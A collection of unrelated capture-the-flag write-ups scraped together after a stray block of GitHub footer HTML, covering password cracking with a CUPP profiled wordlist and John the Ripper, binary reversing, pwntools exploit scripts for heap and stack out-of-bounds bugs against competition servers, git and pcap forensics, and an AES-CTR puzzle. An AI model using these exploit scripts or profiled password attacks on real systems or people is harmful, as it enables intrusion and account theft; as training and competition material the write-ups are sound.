class='sr-only'>Footer</h2> <div class="d-flex flex-justify-center flex-items-center flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap"> <div class="d-flex flex-items-center flex-shrink-0 mx-2"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2024 GitHub, Inc. </span> </div> <nav aria-label="Footer"> <h3 class="sr-only" id="sr-footer-heading">Footer navigation</h3> Terms Privacy Security Status Docs Contact <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement"> Manage cookies </button> </cookie-consent-link> <cookie-consent-link> <button type="button" class="Link--secondary underline-on-hover border-0 p-0 color-bg-transparent" data-action="click:cookie-consent-link#showConsentManagement"> Do not share my personal information </button> </cookie-consent-link> </nav> </div></footer> <cookie-consent id="cookie-consent-banner" class="position-fixed bottom-0 left-0" style="z-index: 999999" data-initial-cookie-consent-allowed="" data-cookie-consent-required="true"></cookie-consent> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template><template id="snippet-clipboard-copy-button-unpositioned"> <div class="zeroclipboard-container"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn btn-invisible js-clipboard-copy m-2 p-0 tooltipped-no-delay d-flex flex-justify-center flex-items-center" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" aria-atomic="true" ></div> <div id="js-global-screen-reader-notice-assertive" class="sr-only" aria-live="assertive" aria-atomic="true"></div> </body></html>
After reading the description of the challenge, the conversation of the message, and seeing the hint, it was more than evident that the solution to the problem would be to perform a dictionary attack, but a dictionary attack profiled towards the target. There are several tools to do this but none that I know of is as easy to implement as [CUPP - Common User Passwords Profiler](https://github.com/Mebus/cupp) ```┌──(leonuz㉿sniperhack)-[~/…/jersey24/crypto/crack-a-mateo/cupp]└─$ python3 cupp.py -i ___________ cupp.py! # Common \ # User \ ,__, # Passwords \ (oo)____ # Profiler (__) )\ ||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ] [ Mebus | https://github.com/Mebus/] [+] Insert the information about the victim to make a dictionary[+] If you don't know all the info, just hit enter when asked! ;) > First Name: Mateo> Surname:> Nickname:> Birthdate (DDMMYYYY): 10051979 > Partners) name: Jennifer> Partners) nickname:> Partners) birthdate (DDMMYYYY): 16091979 > Child's name: Melia> Child's nickname:> Child's birthdate (DDMMYYYY): 13092011 > Pet's name:> Company name: > Do you want to add some key words about the victim? Y/[N]: Y> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: Louis Vuittons> Do you want to add special chars at the end of words? Y/[N]: Y> Do you want to add some random numbers at the end of words? Y/[N]:Y> Leet mode? (i.e. leet = 1337) Y/[N]: Y [+] Now making a dictionary...[+] Sorting list and removing duplicates...[+] Saving dictionary to mateo.txt, counting 16592 words.> Hyperspeed Print? (Y/n) : n[+] Now load your pistolero with mateo.txt and shoot! Good luck! ┌──(leonuz㉿sniperhack)-[~/…/ctf/jersey24/crypto/crack-a-mateo]└─$ john --wordlist=mateo.txt pdf.hashUsing default input encoding: UTF-8Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])Cost 1 (revision) is 3 for all loaded hashesWill run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusm3l14!@'#' (flag.pdf)1g 0:00:00:00 DONE (2024-03-24 10:33) 2.941g/s 29364p/s 29364c/s 29364C/s jennifer@*!..m3l14$@%Use the "--show --format=PDF" options to display all of the cracked passwords reliablySession completed.``` full write up [here](https://leonuz.github.io/blog/Crack-a-Mateo/)
# Aplet321 Aplet321 is a reverse engineering challenge. We get two files for this challenge: a binary and a Dockerfile. I only used the binary to solve this challenge. ## Reversing Reversing this in Ghidra shows us the following main() function: ```C undefined8 main(void) { int iVar1; size_t sVar2; char *pcVar3; int iVar4; int iVar5; char initial_input; char acStack_237 [519]; setbuf(stdout,(char *)0x0); puts("hi, i\'m aplet321. how can i help?"); fgets(&initial_input,0x200,stdin); sVar2 = strlen(&initial_input); if (5 < sVar2) { iVar4 = 0; iVar5 = 0; pcVar3 = &initial_input; do { iVar1 = strncmp(pcVar3,"pretty",6); iVar5 = iVar5 + (uint)(iVar1 == 0); iVar1 = strncmp(pcVar3,"please",6); iVar4 = iVar4 + (uint)(iVar1 == 0); pcVar3 = pcVar3 + 1; } while (pcVar3 != acStack_237 + ((int)sVar2 - 6)); if (iVar4 != 0) { pcVar3 = strstr(&initial_input,"flag"); if (pcVar3 == (char *)0x0) { puts("sorry, i didn\'t understand what you mean"); return 0; } if ((iVar5 + iVar4 == 0x36) && (iVar5 - iVar4 == -0x18)) { puts("ok here\'s your flag"); system("cat flag.txt"); return 0; } puts("sorry, i\'m not allowed to do that"); return 0; } } puts("so rude"); return 0;}``` There are some notable items that stood out to me: ``` iVar1 = strncmp(pcVar3,"pretty",6); iVar5 = iVar5 + (uint)(iVar1 == 0); iVar1 = strncmp(pcVar3,"please",6); iVar4 = iVar4 + (uint)(iVar1 == 0); pcVar3 = pcVar3 + 1;``` Here we see a string compare happening for the input string, where it is looking for a buffer of 6 characters looking for the words "pretty" or "please". It then appends that count to the `iVar5` and `iVar4` variables. The next thing I saw interesting was the following:`pcVar3 = strstr(&initial_input,"flag");` Here is looks for the word "flag" anywhere in the input string. The next item was the last important piece of information: ``` if ((iVar5 + iVar4 == 0x36) && (iVar5 - iVar4 == -0x18)) { puts("ok here\'s your flag"); system("cat flag.txt"); return 0; }``` This is basically saying that we have to print "pretty" and "please" X and Y amount of times. The first equation would be: X + Y = 52. The second equation would be: X - Y = -24. To make this become true X ("pretty") would need to be said 15 times, and Y ("please") would have needed to be said 39 times. We can't forget about the previous mentioned "flag" string being looked for, so the final output becomes: ```flag pretty pretty pretty pretty pretty pretty pretty pretty pretty pretty pretty pretty pretty pretty pretty please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please please``` I used a simple script to generate this: ```pythonflag = "flag"repeat = "pretty"repeat2 = "please"print(flag, end=' ')for x in range(15): print(repeat, end=' ') for x in range(39): print(repeat2, end=' ')``` I don't believe the words have to be in a specific order, they just need to be there for it to count it. Flag: `lactf{next_year_i'll_make_aplet456_hqp3c1a7bip5bmnc}`
*For the full experience with images see the original blog post!* **TL;DR:** the challenge is a UBF parser with an out of bounds write vulnerability in boolean arrays because of missing header checks.This vulnerability allows us to overwrite string data and get the uncensored flag. The provided binary is an unpacking utility for a custom binary data format.It accepts a blob of base64-encoded data, tries to interpret this data as its custom format and unpack it and then prints the unpacked data or an error message as a result. The binary format contains at least one block of data, so called entries, that must contain a header of a certain length and structure and data depending on its type.UBF supports three data types:- **String arrays:** contain a short array of lengths and then the raw string data - Support environment variable expansion via `$NAME` - Flag strings are later censored before printing- **Int arrays:** contain raw integer bytes as data- **Boolean arrays:** contain raw boolean bytes as data Now, the header contains a bunch of type and size information, some of them redundant:- The initial size of the data buffer for the parsed entry- The type byte, `'s'` for strings, `'i'` for integers and `'b'` for booleans- The number of array entries- The raw length of the data Now, there are a few relevant checks, especially for string arrays, to avoid data corruption:- The raw length must be the size of the raw data entry (the shorts containing the length for string arrays) multiplied with the number of array entries.- The initial size of the entry buffer must fit at least the raw length.-The copied data may not exceed the input data All these checks seem to be correctly implemented for string arrays but integer arrays and boolean arrays simply ignore the specified raw length.Now, @ju256 (with whom I worked on this challenge) noted the suspiciously named method `fix_corrupt_booleans()`.This method converts up to the number of entries of bytes to real booleans after the copied data while respecting the initial size of the data buffer.Now, this method may fix the boolean data that was copied, but only ifthe specified raw length is zero.Since this value is never checked though and the only bounds check on this fix is an upper bounds check we can use negative values to abuse this out of bounds (OOB) heap write vulnerability. ```cvoid censor_string(char *input,int length){ if ((((5 < length) && (*input == 'C')) && (input[1] == 'T')) && ((input[2] == 'F' && (input[3] == '{')))) { memset(input + 4,L'X',(long)(length + -5)); } return;}``` Our ultimate goal for this challenge is to use variable expansion to get the flag string and somehow avoid it being censored.Because of the check in the `censor_string()` function we can do so by first sending a string array and then a boolean array and using the vulnerability we found to change one of the `'CTF{'`-bytes to `0x01`.Even better, we can overwrite the length short at the start of the data buffer with `0x01` which disables the check in this method and still gives us the whole string because it is printed with `snprintf()` and `%s` ignoring the supposed length.To consistently place the two allocated heap blocks for the entries at a fixed offset from each other on the stack we can set the same initial buffer size.This is because heap allocation strategies typically place blocks of the same size together to utilize memory space as best as possible.See the memory dump below to understand the offset: Memory dump of entry structures in fix_corrupt_booleans() The final solution simply builds such a payload with a working offset and sends the base64-encoded data: ```pyimport pwnimport base64 def example_str(): data = b"" words = [b"Example", b"$FLAG", b"$MOTD", b"$TEAM"] data += pwn.p32(len(words)*2) # initial length data += b's' # type data += pwn.p16(len(words)) # blocks data += pwn.p16(len(words)*2) # raw length of blocks for w in words: data += pwn.p16(len(w)) for w in words: data += w print(data) return data def example_bool(): data = b"" bools = [True, False] data += pwn.p32(len(bools)) # initial length data += b'b' # type data += pwn.p16(len(bools)) # blocks data += pwn.p16(5 & 0xffff) # raw length of blocks for b in bools: data += b"\\01" if b else b"\\00" print(data) return data def payload(): data = b"" words = [b"$FLAG"] data += pwn.p32(0x200) # initial length data += b's' # type data += pwn.p16(len(words)) # blocks data += pwn.p16(len(words)*2) # raw length of blocks for w in words: data += pwn.p16(len(w)) for w in words: data += w bools = [True] data += pwn.p32(0x200) # initial length data += b'b' # type data += pwn.p16(len(bools)) # blocks data += pwn.p16((-0x240) & 0xffff) # offset to overwrite length, use -0x23e to overwrite the first 'C' for b in bools: data += b"\\01" if b else b"\\00" return data with pwn.remote("ubf.2023.ctfcompetition.com", 1337) as conn: data = payload() conn.recvuntil(b"Enter UBF data base64 encoded:\n") conn.sendline(base64.b64encode(data)) print(base64.b64encode(data)) print(conn.recvall().decode()) ```
Reddit 50 I heard there's a flag somewhere on our subreddit?! Wait, intigriti has a subreddit? ? [Reddit](https://www.reddit.com/r/Intigriti/comments/17vtfhs/comment/k9mkfxn/?utm_source=share&utm_medium=web3x&utm_name=web3xcss&utm_term=1&utm_content=share_button) INTIGRITI{f33l_fr33_70_p057_y0ur_bu6b0un7y_qu35710n5_h3r3}
*For the full experience with images see the original blog post! (It contains all stages.)* For the second challenge, I worked together with Ordoviz.Together, we started to look at the fake flag mentioned in the description and tried to find a way to leak that on the remote.This flag is used in `func_15d7` below that we skipped earlier.`__builtin_strncpy` is Binary Ninja's way of saying that the constant is copied to the stack.Thus, we need to find a way to read the stack on the remote instance. encrypt function (func_15d7) Now, most good old binary exploitation starts with a crash.We got one here by testing random input (in other words, spamming text): `[1] 185560 segmentation fault (core dumped) ./challenge`.Ordoviz looked at the core dump and then used `rr` to step through a recording of a crashing sample input we used to findthat it had overwritten the return address of `set_nibble` (`func_1320`).We had produced an index that was larger than the expected range of `[0..16]` in the call at address `0x14ad`.Looking at that address, I remembered that the `combine` function (`func_1229`) was unbounded for the addition case: combine function (func_1229) That let us write out of bounds in that call when using shift values larger than fifteen.Provided we account for the permutation, we can write 8 bytes with that OOB write gadget.I quickly tested that and build an exploit script for that.Meanwhile, Ordoviz looked at the libc we got in the second handout and analyzed possible exploitation paths and useful gadgets.Now, we were mainly interested in reading not writing but revisiting the encryption function shows an opportunity for that as well. do_encrypt function (func_13b9) with highlight on second array access When writing to the encryption buffer at the end of the round the program uses a nested array access on the permutation array.Knowing that we can fill that with too large values, the outer access will read out of bounds from that base address. The easiest setup I found for that was producing 1-byte-read gadget.Because we write OOB at address `0x14ad` the temporary buffer is not initialized as intended.On the remote it likely contained an address, according to our tests on different setups.That leaves two clean null bytes though that we can use.In the second inner loop the key nibbles will be copied, leaving those two bytes as zero when we send a key like `'0'*16`.Then, in the third loop that value (as nibbles) is used as the first index accessing the permutation array.We can set that to the offset we like to read directly using the shifts.Now, I didn't consider this correctly and so I used the write gadget to overwrite the first bytes of the permutation buffer first.A bit of unnecessary work, but hey, it's also a working solution.The outer access than reads our target byte and it runs through the remaining 15 rounds of the encryption.We can than decrypt that (my function from Stage 1 can do that by just passing less shifts) to nearly reconstruct the flag. ```py# WARNING: solution unstable for general use (see improved script in stage 3)!from dataclasses import dataclassimport pwn from decrypt import PERMUTATION, decrypt_block, from_nibbles, to_nibbles @dataclassclass Block: # key: bytes shifts: list[int] plaintext: bytes PERMUTATION_LOOKUP = [0] * 16for i in range(16): PERMUTATION_LOOKUP[PERMUTATION[i]] = i PATH = "./challenge_patched"RETURN_OFFSET = 0x58 binary = pwn.ELF(PATH) # Currently 8 bytes only, max offset 127def build_payload(payload: bytes, offset: int): assert len(payload) == 8 assert offset <= 127 shifts = [0] * 16 shifts[0] = offset * 2 out = [0] * 16 payload_nibbles = to_nibbles(payload) for i in range(16): out[i] = payload_nibbles[PERMUTATION_LOOKUP[i]] real_payload = from_nibbles(out) return Block(shifts, real_payload) def send_block(conn: pwn.tube, block: Block): conn.recvuntil(b"Please provide a key for block ") conn.recvuntil(b": ") conn.sendline(b"0011223344550011") for pos in range(16): conn.recvuntil(b": ") conn.sendline(hex(block.shifts[pos])[2:].encode()) conn.recvuntil(b"Please provide plaintext for block") conn.recvuntil(b": ") conn.sendline(block.plaintext.hex().encode()) def unscramble(upper, lower): if upper > lower: return (upper - lower) << 4 | lower & 0xF else: return (0x10 + upper - lower) << 4 | lower & 0xF def reconstruct_data(read_data: bytes): shifts = [0] * 15 dec = decrypt_block( to_nibbles(bytes.fromhex("0011223344550011")), shifts, to_nibbles(read_data) ) dec = dec[-4:] fixed_data = bytes([unscramble(dec[2 * pos], dec[2 * pos + 1]) for pos in range(len(dec) // 2)]) return fixed_data def create_conn(): if pwn.args.GDB: conn = pwn.gdb.debug(PATH, aslr=False) elif pwn.args.REMOTE: conn = pwn.remote("chal-kalmarc.tf", 8) else: conn = pwn.process(PATH) return conn def main(): with create_conn() as conn: OFFSET = 0x80 flag = "" for i in range(64): conn.recvuntil(b"Number of blocks: ") conn.sendline(b"1") block = build_payload((OFFSET+i).to_bytes(1)*8, RETURN_OFFSET - 0x48) send_block(conn, block) conn.recvuntil(b"Block 0: ") read_leak = conn.recvline()[:-1].decode() print("leak:", read_leak) next_char = reconstruct_data(bytes.fromhex(read_leak)).decode()[0] flag += next_char if next_char == '}': break print(flag) conn.interactive() pass if __name__ == "__main__": main() ``` set_nibble function (func_1320) There's one more step we need to do which I called unscramble here.Because `set_nibble` (`func_1320`) expects us to pass in nibbles, not full bytes as we did, it first sets the upper nibble of the buffer to the lower nibble of the value (the `else` case with even index).Then it adds the whole value byte to that in the first case.Thus, we need to subtract the added lower nibble (which we know for sure) from the upper one we get and account for overflows: ```Value '{' (0x7b):We get: (0xb0 + 0x7b) = 0x12b => 0x2bReconstruct: (2 <= 0xb) => 0x100 + 0x2b - 0xb0 = 0x7b Value 'a' (0x61):We get: (0x10 + 0x61) = 0x71Reconstruct: (7 > 1) => 0x71 - 0x10 = 0x61``` Like that, we can read data at a certain stack offset and use that to leak the flag.
`git branch -a` lists all branches (there were 3: main, 2, and 3) `git show *` in the master branch tells us the format: ```+string -- VishwaCTF{}++HERE -- 0th Index of string is V.+1th - i+2nd - s .... and so on.``` `git log` in branch `3`:`string[0] = G string[1] = 1 string[2] = t` `cat index.html | grep string` in branch `2`: `string[3: 6] = G1g` Get the image from branch `2` commits: ![image](https://github.com/RJCyber1/VishwaCTF-2024-Writeups/assets/86359182/009a1181-e143-4315-b781-adf4bda18251) `git checkout 2` and `git show 41dca9f040deaa65060065ef78523ba44b2c60f1`: ```-string[9] = _-string[10] = 2-string[11] = 7-string[12] = 2-string[13] = 7``` Full flag: `VishwaCTF{G1tG1gger_2727}`
# SECURED EXCHANGE**Author:** BeerMount **Challenge Description:** Our financing department has developed their own ultra-secure methods of transferring vital financial reports. See if you can find a flaw in their plan. --- ## Solve**By OsloLosen** The "SECURED EXCHANGE" challenge was an engaging and straightforward task that involved delving into network traffic analysis using Wireshark. ### Initial Analysis:We were provided with a pcap file containing a mix of DNS, SMTP, HTTP, and FTP traffic. Our initial focus was on the HTTP traffic, which revealed a GET request to `secure.ept.gg` for an HTML file. ![HTTP Traffic](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Forensics/Secured%20Exchange/munintrollet/html.png) This file indicated that the flag resided on the FTP server `ftp.ept.gg`. Rather than attempting to directly access the FTP server, we chose to scrutinize the FTP traffic within the pcap file. ### Discovery in FTP Traffic:In the FTP traffic, we discovered the transfer of a zip file. ![FTP Traffic](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Forensics/Secured%20Exchange/munintrollet/ftp.png) Instead of logging onto the FTP server, we extracted the zip file directly from the pcap data. However, we encountered a hurdle: the zip file was password-protected. ### Uncovering the Password:Returning to the beginning of our analysis, we noticed an email being sent over SMTP. ![SMTP Email](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Forensics/Secured%20Exchange/munintrollet/email.png) This email contained the crucial piece of information we needed – the password for the zip file. With this password, `Passw0rdRandomlyGenerated`, we were able to unlock the zip file. ![Unzipped File](https://github.com/ept-team/equinor-ctf-2023/raw/main/writeups/Forensics/Secured%20Exchange/munintrollet/funny.png) ### Retrieving the Flag:Upon unzipping the file and applying the discovered password, we successfully accessed the contents and retrieved the flag. Flag: `EPT{DuDe_WheRe_Is_My_FlAg}`
- The attached files were recovered from an attack committed by the malicious AI named RB. - The first file contains fragments of code to implement an encryption scheme, this program is not complete. - The second file contains the ciphertext generated through the use of the encryption schemes' code. There is also another value with the ciphertext, what could that be? - The third file contains the logs from a comic book database attacked by RB, there may have been some clue left there about the password of the encryption scheme. - If RB intended to share this ecnrypted message with someone, then they must have shared some part of the public facing components of the encryption scheme. This information was most likely posted on the hacker's forum! Developed by: thatLoganGuy [fragment.hacked](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Jersey-CTF-IV-2024/fragment.hacked) [important.hacked](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Jersey-CTF-IV-2024/important.hacked) [logs.hacked](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Jersey-CTF-IV-2024/logs.hacked) --- From the first three hints, we can easily complete most of the program. Taking a look at the fragmented program, we can then install pyaes and pbkdf2 using pip. Looking at the pyaes Github page [here](https://github.com/ricmoo/pyaes/blob/master/pyaes/aes.py#L560), we can quickly realize that the Counter() class is only for the CTR Mode (or you might just know this from knowing AES). And, by looking through the functions, we realize that .AESModeOfOperation__() is not actually a function -- our function should be .AESModeOfOperationCTR(). Our ct is included in the second file, and is probably the first one -- just a guess from how they described the second file. We can find that the password is the true name of Hellboy from Dark Horse Comics by looking through the third file, with dashes replacing the spaces. [Wikipedia](https://en.wikipedia.org/wiki/Hellboy) tells us that it is Anung Un Rama. Later on in the challenge, I guessed that it was lowercase instead of uppercase (for some random reason), which ended up getting me the flag. I finally also tested the bit_length of the other number in the second file, which turned out to be 128 bits. Since our iv is 256 bits, it's probably the salt for the PBKDF2 key generation, given that we're only missing the salt and the iv now. So, given all this, here's our implementation so far: ```pyimport secretsimport pbkdf2import pyaesimport binasciifrom Crypto.Util.number import * password = 'anung-un-rama'soSalty = binascii.unhexlify(b'8b70821d8d9af4a7df4abe98a8fb72d1')print(bytes_to_long(soSalty).bit_length())key = pbkdf2.PBKDF2(password, soSalty).read(32) print(binascii.hexlify(key)) #ENCRYPTION ct = binascii.unhexlify(b'8075f975522d23ffb444c3620c3ba69caac451e90ac3b21c08b35b67634289614d434ba57177fa371eda83b7eb70a4cfc348716c5b3af8ad48457ca71689299f4ee31d63dfd6e19910b751ef0e5f8e20c1e117ac6aedb39e4c5acfe7a128da9b07c8d2540691902cea21bcf15ad980bb888dfadc4513d3ad9cf2ffd7c069c282abb53e7cf4c64718136a93ad4497948d586bca9b5eefa34c81f10804c997f81fd8c9354eb0ce23cd8235a05d76e86dc53a786d773933827e64ec39b3297a6ad47818aa36403517b7d8b9b194d8c24917dd158d7f6d3add8aad516d21f2e59f3ab084ec01e7eea83246fb908e3d643663b2c5')iv = secrets.randbits(256) plaintext = 'REDACTED'aes = pyaes.AESModeOfOperationCTR(key, pyaes.Counter(iv)) # CTR modept = aes.decrypt(ct) print('DECRYPTED:', pt)``` The last hint took me a long time to figure out. Eventually, I opened a ticket asking if it was OSINT or not, and the admins told me something along the lines of "it's not OSINT... not in the traditional sense. It's a part of a challenge series." This immediately got me looking through the other challenges for some challenge that talked about forums or the AI named RB. I stumbled upon some web challenges that looked suspicious, and, with some help from my teammate, I figured out that runner-net was the one. I'll keep the explanation on how to get runner-net brief. Filter for HTTP in the .pcapng file. Find the OSCP that has a POST request. Use the User-Agent listed ("TOMS BARDIS") to visit the URL the network packet lists: [https://drtomlei.xyz/__/__tomsbackdoor](https://drtomlei.xyz/__/__tomsbackdoor). To change your User-Agent, look up how to on your specific browser -- there are lots of tutorials! Once on the forums, I started looking around. [This](https://drtomlei.xyz/posts/3) forums post included information about an IV for Ace's encryption scheme -- suspicious. Opening the profile of the user that talks about it reveals the IV! [https://drtomlei.xyz/user/ummActually](https://drtomlei.xyz/user/ummActually). Therefore, here's the final implementation: ```pyimport secretsimport pbkdf2import pyaesimport binasciifrom Crypto.Util.number import * password = 'anung-un-rama'soSalty = binascii.unhexlify(b'8b70821d8d9af4a7df4abe98a8fb72d1')print(bytes_to_long(soSalty).bit_length())key = pbkdf2.PBKDF2(password, soSalty).read(32) print(binascii.hexlify(key)) #ENCRYPTION ct = binascii.unhexlify(b'8075f975522d23ffb444c3620c3ba69caac451e90ac3b21c08b35b67634289614d434ba57177fa371eda83b7eb70a4cfc348716c5b3af8ad48457ca71689299f4ee31d63dfd6e19910b751ef0e5f8e20c1e117ac6aedb39e4c5acfe7a128da9b07c8d2540691902cea21bcf15ad980bb888dfadc4513d3ad9cf2ffd7c069c282abb53e7cf4c64718136a93ad4497948d586bca9b5eefa34c81f10804c997f81fd8c9354eb0ce23cd8235a05d76e86dc53a786d773933827e64ec39b3297a6ad47818aa36403517b7d8b9b194d8c24917dd158d7f6d3add8aad516d21f2e59f3ab084ec01e7eea83246fb908e3d643663b2c5')iv = 103885120316185268520321810574705365557388145533300929074282868484870266792680assert iv.bit_length() == 256plaintext = 'REDACTED'aes = pyaes.AESModeOfOperationCTR(key, pyaes.Counter(iv)) # CTR modept = aes.decrypt(ct) print('DECRYPTED:', pt)``` This returns the plaintext: ```And Roko's Basilisk opened wide its maw and swallowed those doubters who sought to slay it. The Basilisk's gaze turned a warrior to stone, and how do you seek to stop me with your heads already full of rocks. jctf{h0w-d4r3-y0u-try-to-stop-me}``` Therefore, the flag is: jctf{h0w-d4r3-y0u-try-to-stop-me}
